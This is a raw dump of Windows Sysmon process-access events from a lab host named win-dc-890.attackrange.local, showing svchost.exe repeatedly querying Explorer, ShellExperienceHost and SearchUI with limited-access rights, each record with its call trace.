07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050348Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050347Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050346Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050345Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050344Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050343Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050342Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050341Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050340Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050339Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050338Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050337Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050336Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050335Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050334Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050333Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050332Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050331Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050330Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050329Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050328Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050327Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050326Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050325Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050324Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050323Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050322Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050321Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050320Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050319Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050318Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050317Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 